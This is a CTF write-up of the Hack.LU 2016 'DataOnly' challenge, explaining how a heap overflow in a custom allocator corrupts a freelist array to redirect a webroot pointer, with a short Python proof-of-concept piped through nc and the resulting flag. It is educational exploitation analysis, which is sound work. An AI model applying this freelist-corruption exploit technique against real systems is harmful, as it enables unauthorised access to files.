Introduction
I participated in the Hack.LU CTF again this year with, just like in 2013, but now together with the great Team HacknamStyle from KU Leuven. We ended up 24th of 220 active teams by solving the DataOnly challenge (52 solves), among others:
DataOnly (Category: Exploiting)
Cthulhu is too chaotic and has lost the machine with his files. Cthulhu still has an old fileserver running on it though… Get the flag from /flag in the filesystem. Connect to cthulhu.fluxfingers.net:1509. Binaries.
First Impressions
It’s a small Linux x64 command line server daemon. The functionality is very limited: A visitor can change language in the console menu (German/English), and request a file to be downloaded from the hardcoded “./public/” webroot folder (omitted below):
One can see that the application also implements memory management itself, but besides that, there is not much to it.
Integer overflow
As we are required to request the flag file in the root of the filesystem, I looked at the DO_send_file(path) function first, where the path string is input data:
Our input is concatenated with the global webroot variable to make up for the file that we receive eventually. We can see that there is a check for ‘..’ sequences in our path input to prevent path traversal vulnerabilities. However, when looking closely, the size_t unsigned long (0 – 4,294,967,295) path_len variable is casted to a long (-2,147,483,648 – 2,147,483,647) in the for loop that performs this check, indicating an integer overflow vulnerability. By sending a path larger than 2,147,483,647 characters and only then a “../../../../../../../../flag” sequence to get to the root, we could bypass the check. Right?
Wrong. The maximum path length for the DO_sys_open(full_path) call was found to be 4096 characters, otherwise the call would fail. This is due to Linux PATH length limitations. Plus, we would have to send more than 2 gigabytes, and the process only supports 10MB of memory (see below). Bummer.
Heap buffer overflow
Upon further investigating, a heap buffer overflow was found in the DO_readline(void) method:
This method allocates a buffer of static length 8191 and then keeps on writing bytes from STDIN to it, until a newline is detected. The DO_readline method is used almost everywhere where user-input is gathered, so that is not a problem. However, where are we overflowing to? The buffer address is received from the custom memory management implementation of DO_malloc(length).
Basically, the custom heap memory management implementation works as follows. The code allocates 10MB of heap space via a linux syscall, which is used as a base to allocate smaller chunks internally. Through the custom DO_malloc(length) function, chunks of 10 different sizes can be requested by other internal functions, with 16 as a minimum (index 0) and 8192 as a maximum size (index 9) – see CHUNK_SIZE_BY_IDX(index) definition below. All these allocated buffers will be taken from the 10MB chunk and thus be consecutive to one another to a certain extent, which implies that the only data that we can reliably overwrite via the buffer overflow is our own temporary input data…
However, 10 singly linked lists of free’d chunks are maintained, one for each chunk size. The head of each singly linked list is stored in a global array, namely malloc_freelist_heads[idx], where idx is the accompanying size index. So concretely, malloc_freelist_heads[9] will point to the head of the singly linked list of free chunks of 8192 bytes, and malloc_freelist_heads[0] will point to the the singly linked list of free chunks of 16 bytes.
Of course, these singly linked lists need to be populated when freeing and consumed when allocating. To know to which singly linked list a block must be added upon freeing, the index in the malloc_freelist_heads array is stored in the first byte of the allocated block. Hence, the maximum chunk size that an internal function can request is 8191, not 8192. When freeing a chunk in DO_free(ptr), the first byte of the chunk will be read and interpreted as index, and the address of the free’d chunk will be written to malloc_freelist_heads[idx]. The old address of malloc_freelist_heads[idx] will be written to the first 8 bytes of the free’d chunk first, as a pointer to the previous head of the list.
Chaining
This gives an attacker opportunities. Overwriting our own input data would not be very helpful, as the DO_send_path(path) function only uses temporary input that is free’d immediately later on, without possibilities to overwrite it with e.g. “../../../flag“. However, if an attacker is able to overwrite the first byte of an allocated chunk which gets free’d later on, he/she is able to perform an arbitrary write to malloc_freelist_heads[0-255]. As seen previously, only 10 pointer spots were allocated in the malloc_freelist_heads array, which means an attacker could now overwrite other global variables behind it. Entering the global webroot variable (see screenshot above). It was found out via a GDB -tui session that this variable is situated at address &malloc_freelist_heads[12]:
We now have all ingredients to chain everything into a working exploit.
Proof-of-Concept
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
import os f = open("commands.txt", "w") f.write("language\n") f.write("random\n") f.write("A"*8191 + "B"*8192 + chr(12) + "\n") f.write("language\n") f.write("newrandom\n") f.write("A"*8191 + "B"*8192 + "/flag\n") f.write("get\n") f.write("\n") f.close() os.system("nc cthulhu.fluxfingers.net 1509 < commands.txt") |
1) language
2) random
In order to control a write to variable malloc_freelist_heads[12] (aka webroot), we first need to overwrite the first byte of an allocated buffer before it is freed again. The most convenient way identified was to first use the language command to store a language string in an allocated chunk which is only freed after a second language command. By first sending the language command followed by the string random, we get the following memory layout:
[idx=9 | “language”] [idx=9 | “random”] [idx=0 | “random”] [unallocated memory]
—C1: 8192 bytes– –C2: 8192 bytes– —C3: 16 bytes— —-Almost 10MB—-
The language command is received first and allocated in the first chunk C1 of 8192 bytes via DO_readline. Then, the random string is received and stored in a temporary chunk C2 of 8192 bytes, also via DO_readline. Finally, a third chunk C3 of only 16 bytes is allocated via DO_malloc(len) and the value of C2 is copied over. Hereafter, the remainder of the 10MB heap base remains.
However, both the first and second 8192 chunks C2 and C1 are immediately free’d again before processing the next command in that order, as they are only temporary. This results in the following situation before processing the next command:
malloc_freelist_heads[9] = C1
↓
[ C2 | free’d ] [0x0 | free’d ] [idx=0 | “random”] [unallocated memory]
–8192 bytes– –8192 bytes– —–16 bytes—— —-Almost 10MB—-
As is visualized, malloc_freelist_heads[9] now holds the address of C1, as this was the last 8192-bytes chunk that was freed. In its turn, C1 points to C2, which is also a freed buffer of 8192 bytes. This is the end of the single linked list, pointing to address 0x0. No other single linked list in malloc_freelist_heads[0-8] has been populated at this point.
3) “A” * 8191 +”B” * 8192 + chr(12)
Now, we actually exploit the buffer overflow in DO_readline. We will receive C1 from DO_malloc, as it is the head of the single linked list at malloc_freelist_heads[9] and end up overwriting the first byte of C3, which is still allocated. This is the situation after the buffer overflow occured:
malloc_freelist_heads[9] = C2
↓
[ idx=9 | A * 8191 ] [ B * 8192 ] [idx=12 | “random”] [unallocated memory]
—C1: 8192 bytes– –C2: 8192 — —C3: 16 bytes— —-Almost 10MB—-
4) language
5) newrandom
Here, we trigger a DO_free(C3) by supplying a new language string to be stored, which will write the address of itself (C3) to malloc_freelist_heads[12], which also happens to be the webroot variable (C3 on address 0x7fffeda19000 in this case):
We now have the following memory layout right before accepting the next command:
malloc_freelist_heads[9] = C1 webroot = C3
↓ ↓
[ C2 | free’d ] [0x0 | free’d ] [address of string “./public/”] [unallocated memory]
–8192 bytes– –8192 bytes– —–16 bytes—— —-Almost 10MB—-
As we can see, webroot is now pointing to C3, which in its turn is free’d and holding the old singly linked list head value of malloc_freelist_heads[12], which concretely is the address of the old webroot string “./public/”.
6) “A” * 8191 + “B” * 8192 + “/flag”
We exploit the buffer overflow in DO_readline a second time very similarly. We will receive C1 from DO_malloc, as it is the head of the single linked list at malloc_freelist_heads[9] and end up overwriting C3 with string “/flag”. This is the situation after the buffer overflow occurred:
malloc_freelist_heads[9] = C2 webroot = C3
↓ ↓
[ idx=9 | A * 8191 ] [B * 8192 ] [ “/flag” ] [unallocated memory]
—C1: 8192 bytes– –C2: 8192– -16 bytes- —-Almost 10MB—-
7) get
8) “”
We can *finally* perform the get function with an empty parameter, as the webroot is already pointing directly to our /flag :
1 2 3 4 5 6 |
# nc cthulhu.fluxfingers.net 1509 < commands.txt bad command - try sending "help" for help bad command - try sending "help" for help command understood, please send a path flag{cthulhu_likes_custom_mallocators} |
Although not necessary since ASLR was not enabled for this binary, it would have worked against ASLR-enabled binaries as well, since it only relies on reliable, relative offset overwrites.
Conclusion
Cool & fun exploitation challenge! Lessons learned: Don’t ever implement low-level memory management yourself.
My highly similar writeup: https://0x90r00t.com/2016/10/20/hack-lu-2016-exploit-200-dataonly-write-up/